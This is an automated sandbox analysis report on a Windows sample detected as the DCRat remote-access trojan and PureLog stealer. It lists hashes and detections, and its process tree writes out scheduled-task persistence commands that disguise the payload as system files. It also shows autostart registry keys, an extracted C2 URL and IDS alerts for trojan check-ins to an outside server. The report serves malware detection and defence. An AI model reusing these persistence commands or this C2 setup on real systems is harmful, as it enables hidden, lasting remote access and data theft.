Windows Analysis Report
4ra1Fo2Zql.exe

Overview

General Information

Sample name:4ra1Fo2Zql.exe
renamed because original name is a hash value
Original sample name:1b7d99034e439d9f034c9969f88f7b74.exe
Analysis ID:1501437
MD5:1b7d99034e439d9f034c9969f88f7b74
SHA1:8e40bdcdf5092e0afea38110d5f7d4db60c45548
SHA256:916768dc2a2389d20b0216b9fa62c953860eaaee368f529b820ac009f11018b1
Tags:DCRatexe

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 4ra1Fo2Zql.exe (PID: 5688 cmdline: "C:\Users\user\Desktop\4ra1Fo2Zql.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
    • schtasks.exe (PID: 7096 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5888 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4124 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 5316 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6580 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 5628 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2260 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 5316 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5632 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4040 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5860 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2260 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5620 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5632 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\user\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5620 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7192 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7216 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7240 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7264 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7288 cmdline: schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7312 cmdline: schtasks.exe /create /tn "4ra1Fo2Zql" /sc ONLOGON /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7340 cmdline: schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7392 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7460 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7500 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • csrss.exe (PID: 7752 cmdline: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • GrVEPTmsoNTbY.exe (PID: 7096 cmdline: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
    • cmd.exe (PID: 7848 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7900 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7932 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • GrVEPTmsoNTbY.exe (PID: 4124 cmdline: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • 4ra1Fo2Zql.exe (PID: 7384 cmdline: C:\Users\user\Desktop\4ra1Fo2Zql.exe MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • 4ra1Fo2Zql.exe (PID: 7420 cmdline: C:\Users\user\Desktop\4ra1Fo2Zql.exe MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • csrss.exe (PID: 7452 cmdline: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • csrss.exe (PID: 7476 cmdline: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • RuntimeBroker.exe (PID: 7492 cmdline: C:\Users\user\RuntimeBroker.exe MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • RuntimeBroker.exe (PID: 7528 cmdline: C:\Users\user\RuntimeBroker.exe MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • GrVEPTmsoNTbY.exe (PID: 7716 cmdline: "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • csrss.exe (PID: 8096 cmdline: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • cleanup
{"C2 url": "http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal", "MUTEX": "DCR_MUTEX-ln07BHafEPq82yTj5rEF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
4ra1Fo2Zql.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
4ra1Fo2Zql.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: 4ra1Fo2Zql.exe PID: 5688 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: GrVEPTmsoNTbY.exe PID: 7096 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: GrVEPTmsoNTbY.exe PID: 7716 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.4ra1Fo2Zql.exe.30000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.4ra1Fo2Zql.exe.30000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                              System Summary

                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ProcessId: 5688, TargetFilename: C:\Users\user\RuntimeBroker.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", CommandLine: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, NewProcessName: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, OriginalFileName: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", ProcessId: 7452, ProcessName: csrss.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ProcessId: 5688, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GrVEPTmsoNTbY
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ProcessId: 5688, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4ra1Fo2Zql.exe", ParentImage: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ParentProcessId: 5688, ParentProcessName: 4ra1Fo2Zql.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", ProcessId: 5316, ProcessName: csc.exe
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ProcessId: 5688, TargetFilename: C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline
                              Source: Process startedAuthor: vburov: Data: Command: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", CommandLine: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, NewProcessName: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, OriginalFileName: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", ProcessId: 7452, ProcessName: csrss.exe

                              Data Obfuscation

                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4ra1Fo2Zql.exe", ParentImage: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ParentProcessId: 5688, ParentProcessName: 4ra1Fo2Zql.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", ProcessId: 5316, ProcessName: csc.exe

                              Persistence and Installation Behavior

                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f, CommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\4ra1Fo2Zql.exe", ParentImage: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ParentProcessId: 5688, ParentProcessName: 4ra1Fo2Zql.exe, ProcessCommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f, ProcessId: 5316, ProcessName: schtasks.exe
                              Timestamp:2024-08-29T23:03:52.477023+0200
                              SID:2048095
                              Severity:1
                              Source Port:49722
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:53.836158+0200
                              SID:2048095
                              Severity:1
                              Source Port:49715
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:12.255649+0200
                              SID:2048095
                              Severity:1
                              Source Port:49704
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:01.039318+0200
                              SID:2048095
                              Severity:1
                              Source Port:49717
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:44.227003+0200
                              SID:2048095
                              Severity:1
                              Source Port:49720
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:47.305110+0200
                              SID:2048095
                              Severity:1
                              Source Port:49721
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:10.336992+0200
                              SID:2048095
                              Severity:1
                              Source Port:49718
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:57.539412+0200
                              SID:2048095
                              Severity:1
                              Source Port:49716
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:45.070506+0200
                              SID:2048095
                              Severity:1
                              Source Port:49713
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:37.961096+0200
                              SID:2048095
                              Severity:1
                              Source Port:49712
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:35.336473+0200
                              SID:2048095
                              Severity:1
                              Source Port:49719
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              AV Detection

                              Source: 4ra1Fo2Zql.exeAvira: detected
                              Source: http://621287cm.n9shteam2.top/Avira URL Cloud: Label: malware
                              Source: http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.phpAvira URL Cloud: Label: malware
                              Source: http://621287cm.n9shteam2.topAvira URL Cloud: Label: malware
                              Source: C:\Users\user\Desktop\VTXhBlNT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\MjzRNvWG.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Users\user\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\sTRlxExW.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\CAgBdTQY.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\IZdub348jc.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: 00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal", "MUTEX": "DCR_MUTEX-ln07BHafEPq82yTj5rEF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files (x86)\Windows Media Player\GrVEPTmsoNTbY.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\MjzRNvWG.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\VTXhBlNT.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\fuHfGerv.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\gwaXxxDZ.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\myawJPbK.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\xxMkqOtN.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\RuntimeBroker.exeReversingLabs: Detection: 65%
                              Source: 4ra1Fo2Zql.exeReversingLabs: Detection: 65%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                              Source: C:\Users\user\Desktop\VTXhBlNT.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\MjzRNvWG.logJoe Sandbox ML: detected
                              Source: C:\Users\user\RuntimeBroker.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\cPGganVc.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\VLoPWCmN.logJoe Sandbox ML: detected
                              Source: 4ra1Fo2Zql.exeJoe Sandbox ML: detected
                              Source: 4ra1Fo2Zql.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDirectory created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDirectory created: C:\Program Files\Windows Portable Devices\b4601131bf8590
                              Source: 4ra1Fo2Zql.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: \System.pdb source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2199358921.000000001B952000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.pdb source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.pdb source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData\Local
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\Desktop\desktop.ini

                              Networking

                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49717 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49715 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49713 -> 80.211.144.156:80
